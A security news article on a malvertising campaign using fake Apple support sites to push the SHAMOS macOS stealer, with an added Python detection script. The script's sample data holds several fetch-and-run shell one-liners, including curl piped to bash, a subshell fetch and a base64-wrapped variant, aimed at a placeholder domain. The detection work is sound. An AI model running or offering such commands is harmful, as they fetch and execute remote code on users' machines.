
Malicious fake Apple support websites aim to disseminate data-stealing malware in a targeted operation

Malicious version of Atomic macOS Stealer (AMOS) ensnares macOS users through bogus technical assistance sites within a malware advertising scheme.

Malicious macOS support websites disguise themselves to secretly distribute infostealer software in a targeted operation.


CrowdStrike's Counter Adversary Operations has issued a warning about a continuing trend among eCrime actors, who increasingly pair malvertising with one-line installation commands to distribute macOS information stealers.

The warning follows CrowdStrike's blocking of a malvertising campaign that reached more than 300 of its customer environments; the malicious site appeared in Google search results for users in the UK, Japan, China, Colombia, Canada, Mexico, Italy and other countries.

The malvertising campaign, which ran between June and August 2025, aimed to infect victims with SHAMOS, a variant of the Atomic macOS Stealer (AMOS) developed by the malware-as-a-service group Cookie Spider.

Victims were redirected to fraudulent macOS help websites and instructed to run a malicious one-line installation command. The command fetched a Bash script that captured the user's password and then downloaded a SHAMOS Mach-O executable from a specific URL.

This technique lets cybercriminals bypass Gatekeeper security checks and install the malware directly onto victim devices: a binary fetched from a shell with curl and launched straight away never receives the quarantine attribute that Gatekeeper inspects, so no check is performed. CrowdStrike has observed eCrime threat actors using similar methods since June 2025, and the same approach was used in Homebrew malvertising campaigns between May 2024 and January 2025.
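The two paragraphs above describe the delivery shape rather than any specific indicator: a remote script pulled down with curl and piped into a shell, sometimes wrapped in a command substitution or a base64 blob, so the payload never sits on disk as a quarantined file. The script below is an added triage example written for this article, not CrowdStrike's code and not an indicator from the campaign. It flags command lines (from shell history, EDR process telemetry or a macOS unified log export) that match that shape. All sample command lines are constructed here, and example.invalid is a reserved non-resolving domain used as a placeholder.

```python
"""Heuristic triage of shell command lines for the "one-line install" delivery
pattern: a remote script fetched with curl/wget and fed straight into a shell.
Added example for this article (not CrowdStrike's code). Sample command lines
are constructed; example.invalid is a reserved placeholder domain.
"""
import base64
import re
import shlex
from typing import Dict, List, Optional

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh", "dash", "ksh"}
DECODE_FLAGS = ("-d", "-D", "--decode")          # GNU and macOS base64 spellings
# $(curl ...) or `curl ...` inside an argument, e.g. bash -c "$(curl -fsSL URL)"
SUBSHELL_FETCH = re.compile(r"(\$\(|`)\s*(curl|wget)\b")

# Constructed samples: four malicious shapes, one download-only, one benign.
SAMPLE_COMMANDS = [
    'curl -fsSL https://example.invalid/fix.sh | bash',
    '/bin/bash -c "$(curl -fsSL https://example.invalid/install)"',
    # blob decodes to: curl https://example.invalid/a | bash
    'echo Y3VybCBodHRwczovL2V4YW1wbGUuaW52YWxpZC9hIHwgYmFzaA== | base64 -d | bash',
    'curl -s https://example.invalid/x | sudo bash',
    'curl -fsSL https://example.invalid/install.sh -o install.sh',
    'git pull origin main',
]


def _stages(cmdline: str) -> List[List[str]]:
    """Split a command line into pipeline stages (token lists) on unquoted '|'."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    stages, current = [], []
    for tok in lexer:
        if tok == "|":
            stages.append(current)
            current = []
        else:
            current.append(tok)
    stages.append(current)
    return [s for s in stages if s]


def _program(stage: List[str]) -> str:
    """Basename of the program a stage runs, skipping a leading sudo or VAR=value."""
    for tok in stage:
        if tok == "sudo" or re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*=.*", tok):
            continue
        return tok.rsplit("/", 1)[-1]
    return ""


def _decode_echo_blob(stage: List[str]) -> Optional[str]:
    """If a stage is `echo <base64>`, return the decoded text, else None."""
    if _program(stage) not in ("echo", "printf") or len(stage) < 2:
        return None
    try:
        return base64.b64decode(stage[-1], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_command(cmdline: str) -> List[str]:
    """Return the indicator names a command line triggers (empty list = no hit)."""
    indicators: List[str] = []
    stages = _stages(cmdline)
    programs = [_program(s) for s in stages]

    # 1. Downloader output piped into a shell at any later pipeline stage.
    for i, prog in enumerate(programs):
        if prog in DOWNLOADERS and any(p in SHELLS for p in programs[i + 1:]):
            indicators.append("pipe_to_shell")
            break

    # 2. base64-decoded blob piped into a shell; also triage the decoded command.
    for i, stage in enumerate(stages):
        if programs[i] == "base64" and any(f in stage for f in DECODE_FLAGS) \
                and any(p in SHELLS for p in programs[i + 1:]):
            indicators.append("decode_to_shell")
            decoded = _decode_echo_blob(stages[i - 1]) if i > 0 else None
            if decoded:
                indicators.extend("decoded:" + hit for hit in classify_command(decoded))
            break

    # 3. Download inside a command substitution handed to a shell (bash -c "$(curl ...)").
    if SUBSHELL_FETCH.search(cmdline):
        indicators.append("subshell_fetch")

    return indicators


def triage(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each command line to its indicators, keeping only lines with a hit."""
    return {c: hits for c in cmdlines if (hits := classify_command(c))}


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_COMMANDS).items():
        print(f"{', '.join(hits):40s} {cmd}")
```

Treat the output as a triage queue, not a verdict: legitimate installers, Homebrew's own included, are distributed with exactly this `curl ... | bash` shape, which is why the Homebrew-themed malvertising the article mentions worked. The distinguishing signal in an investigation is the origin of the command (a search-ad landing page posing as a support site) and what the fetched script does next, such as prompting for the user's password and pulling down an unsigned Mach-O.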

Cookie Spider is a Russia-based cybercriminal group that rents out the SHAMOS stealer, which targets macOS users worldwide through malvertising campaigns. Notably, no victims were located in Russia, possibly because Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia.

CrowdStrike's assessment underscores the popularity of malicious one-line installation commands among eCrime actors. The security firm published the findings in a recent blog post, urging macOS users to treat unverified websites with caution and not to run commands copied from unknown sources.
